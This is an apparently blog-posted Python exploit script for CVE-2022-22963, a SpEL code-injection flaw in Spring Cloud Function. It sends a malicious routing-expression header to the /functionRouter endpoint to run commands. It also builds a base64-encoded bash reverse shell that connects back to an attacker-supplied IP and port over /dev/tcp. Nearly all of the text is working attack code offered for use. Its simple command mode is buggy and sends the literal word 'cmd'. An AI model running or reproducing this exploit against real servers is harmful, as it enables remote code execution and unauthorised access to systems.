# Spring Cloud Function SpEL 代码注入 (CVE-2022-22963)
import requests
import argparse
import base64
headers = {
"Accept-Encoding": "gzip, deflate",
"Accept": "*/*",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36",
"Connection": "close",
"Content-Type": "application/x-www-form-urlencoded",
}
data = 'test'
def poc(url, cmd):
ur = "/functionRouter"
payload = {
**headers,
'spring.cloud.function.routing-expression': 'T(java.lang.Runtime).getRuntime().exec("cmd")',
}
data = 'test'
requests.post(url=url + ur, headers=payload, data=data,verify=False)
def shell(url, ip, prot):
ur = "/functionRouter"
sh = f'/bin/bash -i >& /dev/tcp/{ip}/{prot} 0>&1'
data1 = sh.encode('utf-8')
encoded_data = base64.b64encode(data1)
encoded_sh = encoded_data.decode('utf-8')
shel = 'bash -c {echo,123}|{base64,-d}|{bash,-i}'
cmd = shel.replace("123", encoded_sh)
payload = {
**headers,
'spring.cloud.function.routing-expression': 'T(java.lang.Runtime).getRuntime().exec("' + cmd + '")',
}
data = 'test'
requests.post(url=url + ur, headers=payload, data=data,verify=False)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', dest='url', help='输入url')
parser.add_argument('-c', '--cmd', dest='cmd', help='输入要执行的命令')
parser.add_argument('-i', '--ip', dest='ip', help='输入反弹ip')
parser.add_argument('-p', '--prot', dest='prot', help='输入反弹端口')
args = parser.parse_args()
if args.ip and args.prot:
shell(args.url, args.ip, args.prot)
elif args.url:
poc(args.url, args.cmd)
else:
print('-h 帮助')
if __name__ == '__main__':
main()
CVE-2022-22963
发布时间 2023-05-23 18:20:06作者: crayonxiaoxin